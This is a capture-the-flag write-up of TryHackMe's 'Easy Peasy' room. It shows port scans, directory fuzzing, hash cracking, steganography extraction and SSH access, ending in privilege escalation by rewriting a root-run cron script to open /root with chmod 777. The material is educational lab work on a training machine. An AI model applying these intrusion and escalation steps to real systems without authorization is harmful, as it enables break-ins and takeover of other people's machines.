This is my writeup of the Easy Peasy room from TryHackMe
Enumeration:
RustScan is a fairly new tool made to speed up nmap scans. I used it to quickly grab the open ports.
1
2
3
4
$ rustscan 10.10.183.42 -u 5000 -q
Scanning ports from 10.10.183.42
Ports: "80,6498,65524"
Running nmap on the above ports reveals two webservers (port 80 and 65524) and SSH on port 6498. SSH usually runs on port 22 so taking note of port 6498 for later is a good idea.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.80 scan initiated Wed Aug 5 17:28:12 2020 as: nmap -sC -sV -p 80,6498,65524 -oN scan_results 10.10.183.42
Nmap scan report for 10.10.183.42
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx x.xx.x
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/x.xx.x
|_http-title: Welcome to nginx!
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
| 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_ 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open http xxxxxx httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: xxxxxx/2.4.43 (Ubuntu)
|_http-title: xxxxxxx Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 5 17:28:27 2020 -- 1 IP address (1 host up) scanned in 14.52 seconds
Now, the instructions under [Task 2] advise to use GoBuster, but I’ve been playing with wfuzz a lot lately, so I’ve used wfuzz to enumerate the website(s).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.183.42/FUZZ
Target: http://10.10.183.42/FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000394: 301 7 L 11 W 169 Ch "hidden"
Total time: 9.035350
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 105.0318
Okay, wfuzz found something called “hidden”.
Navigating to http://
I checked the page source for more information and even downloaded the picture to see if there is anything embedded into it but there was nothing.
So I ran wfuzz again, now giving it the new path:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.183.42/hidden/FUZZ
Target: http://10.10.183.42/hidden/FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000921: 301 7 L 11 W 169 Ch "whatever"
Total time: 9.320403
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 101.8196
Again, wfuzz finds a directory named “whatever”.
Navigating there shows us another picture:
The page is titled “dead end”. Oof… I almost thought it was a rabbit hole. However, looking at the source reveals something interesting:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
background-repeat: no-repeat;
background-size: cover;
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<center>
<p hidden>xxxxxxxxxxxxxxxxxxxxxxxx</p>
</center>
</body>
</html>
There is a hidden paragraph with some kind of encoded value (Which I blanked out to avoid spoiling the flag). Decoding that value gives us the first flag.
Gaining access:
Moving forwards, let’s check out the other webserver running on port 65524.
Browsing to http://
Using wfuzz to scan for directories gives us nothing this time. However, there is a robots.txt.
1
2
3
4
5
6
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:<Some-Kind-Of-Hash>
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
There is an interesting user-agent string in robots.txt. Putting it into CyberChef’s hash analyzer shows that it is highly likely MD5 or MD4. Easy! Just put the hash into crackstation.net and get the flag. Or not… Crackstation doesn’t have the hash (yet) so I looked at different sites to crack it. There was only one that worked, though the site doesn’t work on my pentesting machine. The site is https://md5hashing.net/. I actually spotted flag 2 in the websites hash history then tried cracking the hash. Succeeding to get flag 2.
After this I looked at the source code and spotted another hidden paragraph:
1
<p hidden>its encoded with ba....:xxxxxxxxxxxxxxxxxxxxxxxx</p>
The hint says i’ts encoded with ba… ba-what? Must be base-something. Going to CyberChef and stepping through the base options will do here. Base62 decodes the string into another directory on the website. Navigating there, we get another weird background but this time there is a picture in the middle as well.
Let’s look at the source code for this page too. There is a long number looking like a hash. CyberChef to the rescue! It’s a GOST hash. Now I had quite the bit of trouble with this too because no website I tried was able to crack it. The one that actually can crack it doesn’t work on my main rig… Nevertheless I cracked it on a different machine and got a string that is probably a password to something.
The room hints at a file in the hidden directory. That file is the small middle picture with the binary numbers. I downloaded it and ran binwalk/exiftool and the usual stego tools on it.
steghide turned out to be the winner. Using the password cracked from the GOST hash as the steghide password extracts some hidden data from the image:
1
2
3
4
5
6
7
$ steghide extract -sf <image-file>
Enter passphrase:
wrote extracted data to "secrettext.txt"
$ cat secrettext.txt
username:xxxxxx
password: <bunch of 1's and 0's>
Converting the password from binary to ASCII gives us another password. Checking with the room hints it’s an SSH password. Using it with the username does indeed yields us a user shell. Or does it? My ssh connection kept being refused. Obviously I forgot about SSH running on a different port already! Let’s connect using the actual port (6498)
1
$ ssh <username>@<machine-ip> -p6498
The user flag is right away in the homedirectory. It needs some work to decode though. A message is hinting at rotating the letters. CyberChef can easily do that.
PrivEsc:
Checking if user can use sudo with “sudo -l” shows there is nothing that can be run as sudo.
Checking /etc/crontab → Bingo! The root user is scheduled to run a bash script from the /var/www directory.
1
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
Turns out this shell script is actually owned by the user we are logged in with. This means we can alter it to our liking, essentially making root do anything we want.
I’ve made it change the ownership of the /root directory. (Root flags are usually stored here).
1
2
3
#!/bin/bash
# i will run as root
chmod 777 /root
Now I had access to the /root directory and had access to the root.txt as well.
1
2
3
4
5
6
7
8
9
10
11
12
13
23 root root 4096 Jun 15 01:08 ..
-rw------- 1 root root 883 Jun 15 14:24 .bash_history
-rw-r--r-- 1 root root 3136 Jun 15 12:40 .bashrc
drwx------ 2 root root 4096 Jun 13 15:40 .cache
drwx------ 3 root root 4096 Jun 13 15:40 .gnupg
drwxr-xr-x 3 root root 4096 Jun 13 15:44 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 39 Jun 15 01:01 .root.txt
-rw-r--r-- 1 root root 66 Jun 14 21:48 .selected_editor
xxxxxx@kral4-PC:/root$ cat ./.root
cat: ./.root: No such file or directory
xxxxxx@kral4-PC:/root$ cat ./.root.txt
flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
And that’s it for this box! Hope my write-up has shown you something new or interesting without spoiling too much!